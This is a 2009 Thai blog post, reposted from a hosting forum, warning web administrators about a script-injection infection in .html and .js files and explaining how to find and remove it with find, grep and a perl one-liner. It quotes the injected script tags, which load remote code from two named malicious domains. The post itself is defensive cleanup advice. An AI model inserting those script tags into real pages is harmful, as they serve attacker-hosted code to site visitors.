นโยบายการจัดการความรู้ มหาวิทยาลัยสงขลานครินทร์ 1.ให้ใช้เครื่องมือการจัดการความรู้ผลักดัน คุณภาพคน และกระบวนทำงาน 2.ส่งเสริมการแลกเปลี่ยนประสบการณ์การทำงาน จากหน้างาน 3.ส่งเสริมให้มีเวทีเรียนรู้ร่วมกัน
อ่าน: 1610
ความเห็น: 0

[[Alert !!]] ระวัง ไวรัส iframe รูปแบบ ที่ไม่ใช่ iframe ! (พร้อมวิธีค้นหาและป้องกัน)

[[Alert !!]] ระวัง ไวรัส iframe รูปแบบ ที่ไม่ใช่ iframe ! (พร้อมวิธีค้นหาและป้องกัน)

ที่มา : http://www.thaihosttalk.com/index.php?topic=23815.0

วันนี้เจอการแทรกสคริปแนวๆ iframe ของลูกค้าบางราย

 </head>
<script src=http://achtbanen.org/images/b-one-default.php ></script><body>

  มี <script src=http://bootyassboobs.com/images/postinfo.php ></script><body สำหรับไฟล์ .html.bak ด้วย 0.0)

เป็นการแทรกขั้นเทพกว่าเดิม รู้สึกว่า มันจะแทรกก่อน <body นี่ล่ะครับ


ข่าวดีคือ
-ไฟล์ *.php ไม่มีการติดเลยซักนิด (เท่าที่เห็น หรือเป็นเพราะว่ามันไม่มี <body> นี่ล่ะ)

ข่าวร้ายคือ
- เป้าหมายไม่ใช่ index.html index.htm index.php main.html main.php อย่างเดียว
- *.html โดนหมดดดดด แถม .js ก็โดนด้วย ทุกชื่อไฟล์ที่มันสามารถแทรกโค้ดได้

คำสั่ง find เพื่อดูว่าโดนไฟล์ไหนบ้าง

find / -type f -name '*' -print | xargs grep 'achtbanen' |more

 ประยุกต์ ด้วยการสั่งเขียนไฟล์ แล้วดูผ่าน xxx.xxx.xxx.xxx/chk.txt ประมานนี้(ประยุกต์เอาเองโลด)

find / -type f -name '*' -print | xargs grep 'achtbanen' > /var/www/html/chk.txt

 วิธีแก้ แบบคนขยัน
1.เข้าไป ftp ดึงมา ลบโค้ดออก แล้วอัพกลับ
2.chmod 404 (ไม่คอนเฟิร์มว่า ช่วยป้องกันหรือเปล่า เทพๆเขาว่ามา)
3.เปลี่ยนพาส ftp
แนะนำเพิ่มเติม ถ้าไม่อยากติดไวรัสอีก
4.ล้างเครื่อง
5.ลง antivirus
6.ใช้ chrome หรือ firefox+noscript
7. วิธีป้องกันไวรัสต่างๆ ฯลฯ

วิธีแก้ แบบคนขี้เกียจ
1. หาตำแหน่งโฟลเดอร์ ที่ไฟล์ที่มีไวรัสอยู่ ด้วยโค้ดนี้

find . -type f -name '*' -print | xargs grep 'achtbanen' |more

 ก็จะได้ผลลัพธ์ออกมา เช่น

./domains/domains.com/public_html/folder/index.html:<script src=http://achtbanen.org/images/b-one-default.php ></script><body>
....
....
./domains/domains2.com/public_html/folder2/index.html:<script src=http://achtbanen.org/images/b-one-default.php ></script><body>

 2.ต่อไปรันด้วยคำสั่งนี้ โดยนับจำนวน path ให้เท่ากับ จำนวน * (ตามสีแดงๆ) เช่น

 perl -pi -e 's/<script src=http\:\/\/achtbanen.org\/images\/b-one-default\.php ><\/script>//g' ./*/*/*/*/*

 แล้วคราวนี้มันก็จะลบโค้ดให้โดยอัตโนมัติ สบายๆ

3. กลับไปทำตามขั้นตอนที่ 1-2 ใหม่ จนกว่า จะมีมีการ report ออกมาว่าโดนไม่ไวรัสแต่อย่างใด ส่วนวิธีการที่เหลือ ตามวิธีด้านบนก่อนหน้านั้น เพื่อป้องกัน ระยะยาว

ส่วนไฟล์ .js เข้าไปลบด้วยมือเอาละกัน ขี้เกียจหาความง่ายๆล่ะ

ข้อป้องกันพิเศษ ไม่ใช้ ftp ในการอัพโหลดไฟล์ใดๆเลย 0.0 (สำหรับผู้มี ssh ใช้ winscp หรือ putty command เอา *0*)

แค่นี้ก็เสร็จแล้วครับผม

ปล1.สามารถนำไปประยุกต์กับพวกไวรัส iframe หรือโค้ดต่างๆ อันไม่ถึงประสงค์ *0*
ปล2.บทความเหมาะสำหรับผู้ดูแลที่ใช้ ssh ได้ หรือ shell script บน server ได้ จะเหมาะกว่า
ปล3.ขอบ คุณความช่วยเหลือจาก พี่ไอซ์ (icez) , พี่ตี่ (hack3rb43), พี่แบงค์ (BestThaiHost), พี่ไก่ (Thaitumweb) แห่ง thaihosttalk.com และ google.com

หมวดหมู่บันทึก: เรื่องทั่วไป
คำสำคัญ (keywords): iframe  js  ไวรัส
สัญญาอนุญาต: สงวนสิทธิ์ทุกประการ Copyright
สร้าง: 29 ตุลาคม 2552 01:37 แก้ไข: 29 ตุลาคม 2552 01:41 [ แจ้งไม่เหมาะสม ]
ดอกไม้
สมาชิกที่ให้กำลังใจ
 
Facebook
Twitter
Google

บันทึกอื่นๆ

ความเห็น

ไม่มีความเห็น

ร่วมแสดงความเห็นในหน้านี้

ชื่อ:
อีเมล:
IP แอดเดรส: 100.25.43.188
ข้อความ:  
เรียกเครื่องมือจัดการข้อความ
   
ยกเลิก หรือ